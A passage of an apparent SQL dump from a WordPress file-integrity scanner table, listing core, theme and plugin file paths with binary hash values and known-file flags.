B膼�̪�','',0,'?'),('--�ü��$�);��J5','wp-includes/js/dist/rich-text.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�����Lc#Ul6��E','C��7�CG��,A�b�c�j*�jF�i�!��c!V','',0,'?'),('-5��Z�E��ؒe�','wp-content/themes/newsmag/inc/customizer/epsilon-framework/assets/vendors/selectize/selectize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%���>ݒ��/��;','�@o�NRƈj��J�X�P�� �~�0b�','',0,'?'),('-R�̘��S.s_���d','wp-content/themes/Endolf/FT/plugin/updater.php',0,'uc3\\����[\'�N�9�','uc3\\����[\'�N�9�','Q�s�=\\Eؐ�@���\0EF�r�^Do���\\','',0,'?'),('-\\��[�����J�ץ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/ChaCha20/Ctx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�1���	�M����]�','��A8��{�!��V�t<S��qH�oh�4��y`By�','',0,'?'),('-fx2�6af�?���M�','wp-content/themes/graduate/inc/modules/map-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)	�Sh���2�fZ҉','�Z��S:�M�{]ʉ��0�����\Z�镵*��','',0,'?'),('-jާ� �����~hyb','wp-content/plugins/wordfence/lib/menu_support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c�-ce$���','��\"\n�|�\'iJ���O��u;�DU���8','',0,'?'),('-kdϯ���X�w\\7���','wp-includes/admin-bar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y��\'[+�\"�c�W','J�����xb��ADHM����2������6�M�','',0,'?'),('-n�]A�@����7��','wp-content/themes/exoplanet/functions/css/chosen.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����;D	�d-��','��e��p�y�\'����pB\'O����[}R�','',0,'?'),('-w�T��r�Y��90�y`','wp-content/plugins/wp-cerber/cerber-request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xf�ڒ�k�Di��','�� f����7�6��\"������`)���','',0,'?'),('-}�4�$���ԧ5�\0','wp-content/themes/catch-responsive/inc/catchresponsive-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"U�8��$E�','3K�.����҂K2�����\\#CV�2��#�','',0,'?'),('-����Ǹ�%w=��','wp-admin/css/colors/ocean/colors.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������V�*,^b*$�','nh�ᷘvU�?D��4��w�Zq������w_','',0,'?'),('-���_���mq+��1�','wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h㠲���i�e��ɡ','IH�Mp\\��N�h\n׈N��F=-���Z�=hO','',0,'?'),('-��)7�5y�8c��Wv�','wp-admin/about.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�̖��Tz�<��s*�',',�!�G�1�g�?�GQr�������b^�~','',0,'?'),('-�{�����	��+�','wp-content/themes/simpleshift/inc/kirki/assets/scss/controls/dashicons.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r/\Z�5��S������','�G��\"�]icsҺ���҂�ڒ�(���','',0,'?'),('-�_��+��Yn��S','wp-includes/js/jquery/ui/tooltip.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�\r��c5V����h','+*5�~oѼ�>�\\Z������c���l�','',0,'?'),('-�f��4]�#\"u��l','wp-admin/css/colors/light/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b�Y�%��u#+�eR:?','8�;\0�0�p�7L��2ү���r@��n�','',0,'?'),('-��[pp��q\0jm','wp-content/themes/weblog/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9V�Z�m�@u@���','F�u<޾�\r���$t�me����)�0a�A	6^','',0,'?'),('-���{�\nwQ���^g','wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�}Z/���X[�{6��','p���W��	��/������\r��񒃄%\Z��`','',0,'?'),('-��藂��Y{]ns�','wp-includes/css/wp-pointer.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�U�Y�D�K�z�c','>�;��]ۼH�Ֆ&�ݟ�������`;�','',0,'?'),('-���H��Ч*v�!��+','wp-content/themes/simpleshift/landing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`�W��F���\'b>ل','��5N+�^v��u���&kxam�0��1�:8���','',0,'?'),('-�d�L�ƥXH�m�','wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ap!}��7�Wsj�','j�����=Xi_����ְނpߤ��^Ѯ��','',0,'?'),('-���ł��0m�','wp-content/themes/graduate/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ot� E9�i�)�',')�>r!U@�}өR��2qʙ�\r�(�}����','',0,'?'),('-��dž{����B]','wp-content/themes/Kent/header.php',0,'~V����d�)��Ⱦ�','~V����d�)��Ⱦ�','���g�!��w:�VtI���w�D�r/��g8��','',0,'?'),('-�\'*���J���O@�	','wp-content/themes/skt-pathway/css/mobile_hz.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���c�%��iU\0���Zj','J~���ݛ�]��:�$�2����C/]odgk','',0,'?'),('-�l�E�{�c�r��5','wp-content/themes/graduate/inc/customizer/theme-options/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��$\r�*�\Z�4Q�0�','����>�JI�h�&N���a�\n:�ӗ�H','',0,'?'),('-�ܕO�r�`�x;��q','wp-content/plugins/wordfence/modules/login-security/js/login.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~V���tj�:��','.�y�@�Ive\Z�?g�d����h�O�����\0','',0,'?'),('-�ha+`NST����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>:�wv��:4p��Y ','Ϲ�%虬Yu{].���ג�d�.��@��','',0,'?'),('-��v�	N�\'�`��','wp-content/themes/hitmag/search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�5���=_��ks:s','�ہ�pl�B¦��X��_��[!Ţi݊�~','',0,'?'),('.5#%\n�\ZY�+%�~�','wp-content/themes/simpleshift/parts/image-750_500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}q�H	����	0�c','QL���\n�󐝝a���ƥ�\'�������pYa','',0,'?'),('./^�|X��у�','wp-content/themes/metro-magazine/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ϨD��0\0ɬ���g','��c�jO���Z��󉁨�c��2�M�����','',0,'?'),('. �\0_oE�]A�_�0PJ','wp-includes/js/tinymce/plugins/wpautoresize/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�.�Aj_�m�r#i�','\'��C��b\"B��\\�N�N���*r&.X��J','',0,'?'),('.7%s�S��	�k\\�rLl','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/edit/matchbrackets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ŏ��1D�i2�&��','k\"l��EE��\'꣢d:=����\"�,%p','',0,'?'),('.B>�˷Q�?�޴6���','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/theme/lesser-dark.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�h�xl��_uf��I_7','W�:���6��Z�{����B!C�\n`��	��','',0,'?'),('.IhU���3��+B\Z��','wp-includes/images/admin-bar-sprite-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q����8��o��','*E��Ts���al�^�p��X���Z\0��','',0,'?'),('.Y�Y�n4�(G=\"R6','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-code-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X$-v�L�h�UH','��M5E��_�Ozm5*�28�M��- %:���','',0,'?'),('.l�%���1��tJv�','wp-content/themes/graphene/js/chosen/chosen-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%�����\\k��9��1~','� s7�e�l��^\Z�e5Gx�^�� eb�O�r','',0,'?'),('.x��Ϯ�7����_�','wp-includes/js/mediaelement/mediaelement-and-player.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\"���\n�-ۤ�Y','$9~�=:����Z�F�m}�A�5ks�	V#� �*','',0,'?'),('.�麉D0�u�L-c�','wp-content/plugins/wordfence/views/options/option-toggled-segmented.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t���n`K��T�Qr�','~eY�Ze�s��27��������B/=T�3oH�','',0,'?'),('.�]\"a,����٬C','wp-content/themes/graphene/admin/feature-pointers.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':4^�9\0�{��5u�','s��ܡ����`��0�%��o��L(�W{','',0,'?'),('.�:�p�pY!�,4\"ʤ*','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/addon/search/matchesonscrollbar.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���:�4��p���a','�L�p��+]+�9��	�d���g|���f���','',0,'?'),('.�E�[J��l�x��','wp-content/plugins/wordfence/images/forward_disabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M_��Z?�N)�Ҋ�:�5','���/�<>O&�ȕJR݇e�}�(��m','',0,'?'),('.�Crf���͢u����','wp-content/themes/simpleshift/inc/kirki/assets/js/vendor/codemirror/mode/textile/textile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����/�\Z[9}��','|�\Z���j�m��Մ&~MS�p���^9r���c','',0,'?'),('.���6_ P�7��G','wp-content/themes/advance/inc/kirki/assets/scss/controls/sortable.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&��Eiz�y=�%�v7','`#ó��ːŘ3f6�b��0�;����,���J','',0,'?'),('.��7�f�w9Pm@����','wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0�H�#�IHD���','�v�o�VYx�?���\n��\n&3c-\r�8�m��','',0,'?'),('.���s��өF�6�=�\\','wp-content/themes/advance/pagination.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ۗ+����\'T*\Z�O�h','�M�,$	2r	�o!>\n䘅�Z��y&�u���','',0,'?'),('.Ӈѯ\rW�ț�g���','wp-content/themes/enigma/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�_\n$��*�����.','�K�I��Z�0��n���}� �~�]�UB���','',0,'?'),('.��	r��\Z�Q���','wp-content/plugins/wp-cerber/assets/flags/gm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��S\'�A)����zU$',']�Z��!�p������1�{f��^EQ3sH','',0,'?'),('.��jAC�ǤL��S�\Z','wp-content/themes/brickyard/images/icon-facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ЭK��AM	��','�{����~��S����~]�E2���VW�','',0,'?'),('.�a��7W��\rjz','wp-content/themes/simpleshift/inc/kirki/includes/controls/class-kirki-controls-dashicons-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0q�wQ9h[�k�','��(�>���݉Y,��*+T<k�t|t�g','',0,'?'),('/2�n���YA�n��','wp-content/themes/Endolf/js/navigation.js',0,'z��A��\n�Dh���Ř','z��A��\n�Dh���Ř','�*��$�]\r��|���\"�p�z��-x��','',0,'?'),('/\nt9~�d����s	k','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/abcdef.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�� ;=#g+	�a;','A#Fk�@I�E�Pyh<����	���.@�&��\0�','',0,'?'),('/����v���%','wp-content/themes/the-best/genericons/genericons.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P\r�6��Xw��x�M',')��@ �ѵv�P�4\\W*Y�\'�-c�|����','',0,'?'),('/*:����o>�t����','wp-includes/js/dist/autop.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭Φ� ��$=\Z��','��-�����ي�&%����~.+oVr�,>꾥W','',0,'?'),('/<ا^ɼf}�\"��$�','wp-includes/images/media/document.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�4�8�Αy�6�d�','��ø`�������f	I$ _Z�X�\"0\r��,','',0,'?'),('/@_�s!>�9)�镥�R','wp-content/themes/graphene/rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��<i���Pܡ��J��','��cpm�u��wc�E.��k[��ة����n�','',0,'?'),('/bx�����3� �I�d','wp-content/themes/authorize/assets/js/navigation.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�ak���T\nOQ�Ni�','\Z��N@%�O����C��{nrT0�A���1��U�','',0,'?'),('/s�q�2������;>�','wp-content/themes/wp-simple/inc/kirki/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','bKjP�����{�Š�w2','V��������8���g��{i��E��*><��','',0,'?'),('/u)���ȢQ�>�����','wp-content/themes/wp-simple/inc/kirki/assets/js/vendor/codemirror/theme/elegant.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�wl�n{�����pB�','�8d;��/�Q�f��Z�\\A��i��6�YRi�','',0,'?'),('/x�=�/B��bws\\��','wp-content/themes/simpleshift/assets/js/parallax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�n�-�Y2A\Z_�L��','���v�F]Ì !T��R��i\n�&�Q*P�7','',0,'?'),('/�&��%��3wy�½4�','wp-content/themes/wp-simple/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.�>:�?S�^N\\','���f�2�ܭiz٘Y���\'e�_Dd8–�','',0,'?'),('/�Ʒ��;�7b�\Z�Z�','wp-content/themes/wp-simple/inc/kirki/assets/js/kirki-tooltip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����a�x	d��\"�','<̧[~4��ѽP9\Z#�͙+\Zק7?TR ��>L','',0,'?'),('/������}`EV�|m','wp-content/themes/wp-simple/inc/kirki/includes/output/property/class-kirki-output-property.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�Z�k��\0	���l��','U���jA	��\n�a�cD��_�Q\"-��.�	�','',0,'?'),('/���C:�ٱ�_���t\"','wp-content/themes/advance/inc/kirki/includes/field/class-kirki-field-spacing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�̝�\"�\\~�#Zd;','7�b�R�4�S���@����s}�.3��EN','',0,'?'),('/�FN��si�f%֜w\Z','wp-content/themes/graphene/js/graphene.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K)\0榭�/�\\\"B��-�','��\"�V��#��?����Xc��{��a@��n�','',0,'?'),('/��}㦿L�;?�w\\','wp-includes/Requests/Exception/HTTP/401.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';*������?�d��@','YV$���/���@=������V-��dc�','',0,'?'),('/��M�n�����(�sv','wp-content/themes/twentynineteen/sass/navigation/_menu-main-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/No�\'�n�v��9�,�','�J�P\"Aұ\r�S�P4In\Z*�0A\'�ϫ��p�/]','',0,'?'),('/�s��C4�������','wp-admin/network/setup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	w�����T�A;�}Ad','��韌�\'�MN�+�ƺ�R����g','',0,'?'),('/�|B\nJ�^��-�Y','wp-content/themes/catch-flames/content-featured.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S�e\\w�:���Qu','Y_�;�1b}o���%�h�	<9�*oUc�U� N','',0,'?'),('/�]f�J{s���p�5�B','wp-content/themes/saybusiness/css/bootstrap.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}�M`�W��UW\'��U','�fz�L�06�,��L�_F��s��7�Nb�/S','',0,'?'),('/�gRĘ���\nq>0��','wp-content/themes/wp-simple/inc/kirki/assets/js/controls/radio.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{4��ȦAGȲ�n��\"','I��\r�α���m-g����$s�=�\\�O���&+','',0,'?'),('/�Cٺo2c��0#�T�','wp-content/themes/edge/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j@�SS�,˥ �	=','�K��_k��CU\Z�KoK6�Y[ˇ(ϒ��','',0,'?'),('/�K=6?y�{���|Lʢ','wp-content/themes/chronus/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f�=o�Շ!��B��','�朇���\'싶��\r������~�V�^','',0,'?'),('/鹠���ΰ1�iw��','wp-includes/images/uploader-icons-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���&-��O��Õ�~','���r�\0����\'_>��6��QW��4ڠR��','',0,'?'),('/�^�P����t��','wp-content/themes/skt-pathway/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','īNJ�n]����\\','�ϣ)�b{H��n�{���� (��b!���#�>�','',0,'?'),('/�jI³Ԛ�\'NZH','wp-content/themes/city-store/assets/font-awesome/css/font-awesome.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�َ�K\'���ȊE�G�','���~��̣�K�/*�PG1�,��DA���s','',0,'?'),('/��f��P�j>X��','wp-includes/sitemaps/class-wp-sitemaps-renderer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V}d��T�ܧ�C\"º',':�i��K��,�c}i1�d��4l�c�2Œ�2','',0,'?'),('/�����5SQU۶v+�','wp-includes/rest-api/endpoints/class-wp-rest-autosaves-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[\0a�C����J�','��g4W\"3~U��Ӕ�,=$\'���W�S9����','',0,'?'),('/��\Z����q\"�ͫn�','wp-content/themes/advance/inc/kirki/assets/images/3cl.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��o��i�#�2�:V','߰-t���:�uq�m��\\�VQ���L\'��G[@�%','',0,'?'),('0ٿ��I]��)�-�','wp-content/themes/hitmag/inc/kirki/assets/js/controls/dashicons.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yrK�{�J��mf�Q��','畦��A\'!���K��rN�2����u�v.�d','',0,'?'),('0����!�Ə0��R','wp-content/themes/wp-simple/inc/kirki/kirki/assets/js/vendor/codemirror/mode/haml/index.html',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','̽�@)��j�����','Ǒ�(8�y[��8w�����O��8$\"�����','',0,'?'),('0,j@�3l���>S2�1','wp-content/themes/wp-simple/parts/header-banner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Vt�(��;`�O�','�.�F��t\Z�epC?0*]�M�n�W^,�������','',0,'?'),('03�9�п��X��Em<\Z','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/hint/sql-hint.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3 ̱��>��','��~�B�\\:e������b+��\"�[3_mK��','',0,'?'),('0<����lڿ��J��','wp-includes/js/wp-backbone.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K�/�����7���b','���9J7�A���G���uq!@/nS]�<o�e�}�','',0,'?'),('0<�9���u�;SZ\rj','wp-content/themes/twentytwentyone/inc/template-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',���q*�ëp��hvD�','3�D��U�Bf�0��d��b�kTJuMY,�N','',0,'?'),('0Sg\rZ�Jzl�>��i�','wp-content/themes/hitmag/inc/kirki/includes/sections/class-kirki-sections-expanded-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���\r$�6�4�','��Ƭ|��N,��$��h�f��Ey��o`�~','',0,'?'),('0]�qK\'�f�x����','wp-includes/js/tinymce/plugins/compat3x/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�{��p�׶�Ҡ','��m�澑�[�S3��\'�J�*��Sts�j���','',0,'?'),('0j�Vƽ�f:�5��`�\\','wp-includes/js/customize-selective-refresh.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�G�埳6�0�b�','G���i�A�w_�P�g�9����Oɓ��M�','',0,'?'),('0k�sm\\�c��4�Q�','wp-content/themes/gildrest/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J��\"7i��q9�T','/q�^G&����\n@`��c\r�t��o��6I	슅','',0,'?'),('0x�h��ͭK��3��T','wp-includes/class-wp-fatal-error-handler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����-����v�','�\n!%�D��F��B�^�s��plhVe��7\'U��','',0,'?'),('0����a�O�ZI|I�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�HY ��²��','zI]�_�Dz��!�bш�6�d�uY�3','',0,'?'),('0�cPm���Ҩ���)�','wp-content/themes/education-hub/inc/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y�K��\n=l���1�\r�','����\n�\0�:gd�\"~�������I@�\r�','',0,'?'),('0����k� ?ޞ���','wp-includes/js/jquery/ui/effect-scale.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',ʡ0��\\K4\'��t�','Ұ�-yߎf+�)�R��q[t�QJ��Z ?','',0,'?'),('0���E\00���X�H','wp-includes/js/colorpicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��3+ h\"��C��k','�0O����ކ�������=u)��g8b/�','',0,'?'),('0���5����Gl','wp-content/themes/wp-simple/inc/kirki/kirki/includes/field/class-kirki-field-sortable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9i���Ư���','�?��O�e�}�z���dnU��W�C4vl��~','',0,'?'),('0�Bip�(���I5B�q','wp-content/themes/auberge/template-parts/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڹ�#ǫ�MgG<��V\Z','D&��qPx�7���O�i��5VJ���X��J�g','',0,'?'),('0�Q/�M�L\'�Zî��','wp-content/themes/advance/inc/kirki/assets/js/controls/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A-�2��4���(�28�','�]�G�_3c����[���=�\Z�/�%1&','',0,'?'),('0�dۦZP�2��o�','wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ս$����6�\"�','��^h\'z�[��j���ӊ%\Z�pã��j.�S','',0,'?'),('0�~y��D��	��{{','wp-content/themes/simpleshift/inc/kirki/includes/field/class-kirki-field-custom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V�,��Rz\ZN','��aⓦhU�H �\r#j�⽋0!�;YD�k�','',0,'?'),('0�ň����}m�X9�q','wp-content/plugins/wp-cerber/assets/flags/zm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\\|e�D�gk�^���','�yЩ&VUą;�}��D4E���3�)\\','',0,'?'),('0�F��@��Ҵ\"�1*','wp-content/themes/hitmag/inc/kirki/assets/js/vendor/codemirror/addon/comment/comment.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �T�m☴s����z','���37\ZZu&��G#̨\'��5:�H���e<�','',0,'?'),('0����I��\Z8�\'�x','wp-content/plugins/wp-cerber/assets/flags/tk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ȕ��n��e�Y�T��','I��/�:���5s ;�#bi)��4k ����','',0,'?'),('0�i��LS� �q���','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-firewall-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���%��K\Z��{�V','���k��^�qݵ;�e8�K���=AaЮM_���','',0,'?'),('0��$X8F�nŃk���','wp-includes/js/dist/vendor/wp-polyfill-dom-rect.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e�-{\'B�����Qa','m\\��\0W/v�-O�R�w�mF���}o�P��D','',0,'?'),('1!� I��<Em#','wp-content/plugins/wp-cerber/assets/flags/ee.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|��h�~�\rO�����','��R�Bᣛ�݇84ɐ6B����\0ȸ�:l-�IB','',0,'?'),('1� ĒY��Ҵ\r�','wp-content/themes/newsmag/assets/vendors/bootstrap/glyphicons-halflings-regular.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ዿa*.C��q�/N','�Iٖ��KJ\"�t�ϭ^�b_[#f�K�:O)g','',0,'?'),('1\"��0ؔT5�/�vA','wp-content/themes/advance/inc/kirki/assets/scss/controls/select.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��x���q(��\n���]�','�}5�~��EPUW�m��nq�:;D�B��:K��E','',0,'?'),('1\r���2<X\'ė/tk','wp-content/themes/Endolf/FT/plugin/options-framework/includes/class-options-media-uploader.php',0,' 3r7z��Vy�g �X��',' 3r7z��Vy�g �X��','Nٝ�cǐ�%�QQ�^�p���h�j:r���ӯ','',0,'?'),('1���YӌEϸC�a�','wp-content/themes/quicksand/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{�f�]kё��-Hu_','�%n��Sq�lfj?����x���M�V�I�e�','',0,'?'),('1�&��}�::wX:;S','wp-content/themes/education-hub/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O,Cm;矁]R�d','�V�+Q#e����Fm���%w��2M*sFÌ#n�','',0,'?'),('1&R�2�8��Q-V�m','wp-content/themes/advance/js/halfparallax.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7F��W>Q\'=˔','0��\Z�`��R�4�۶�ޞيf�C��a','',0,'?'),('1,DdE�����M','wp-content/themes/Endolf/single.php',0,'��)�X����wv','��)�X����wv','	�?���M��?5�n�jv��=�����e','',0,'?'),('1-�����g97���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P�B���.��}�F�','��c�(����k1�����2�Qw4��?0','',0,'?'),('1/���|�y������N','wp-content/themes/city-store/assets/js/city-store.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�T~�4�}��yD',' �Z�ND�&qOj�fJ����b+]�R�qo�S','',0,'?'),('1?o�x��<�?���6','wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}��a2P���KQ��i\"','����F�;L��_����-������-��N��x','',0,'?'),('1A����,\ns����v','wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��)��ɾNS(�! 4Z','��/�[��f	�nU���!79�8^94����M','',0,'?'),('1G�[��D��qW�t��','wp-content/plugins/wp-cerber/assets/flags/gy.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q��B��}��>_�','L�:�,���B[���aa<���w�*@������','',0,'?'),('1^��BsCZU*��M�>','wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/o�-�6��ѥ�p|','���dd�^�#QҒ\Z�#q�^�Ɠ�J�w�','',0,'?'),('1m�{��MA�i��','wp-content/themes/Yegor/page.php',0,'��ژthȴ���','��ژthȴ���','4Nˍ,��o�G�`r\Z��``A���	�?	L','',0,'?'),('1s�)6�Ӷ���C��Η','wp-admin/user/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T^�1�����A�|','Y��%մ9����N��?\\v\\a��M���~݋','',0,'?'),('1v\n��!�>xX*�_�','wp-content/themes/graduate/assets/js/custom-customizer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����l�6?��݄�','�F��0fo:����t�.�\\�{�_��q��魅','',0,'?'),('1�3\r\rI��W��\\��','wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ov_J�ex��	V-\r','�߬a�#�1Ȫ���s�9��;�\0e�oH߉T��','',0,'?'),('1�7�F0ܩ��^ 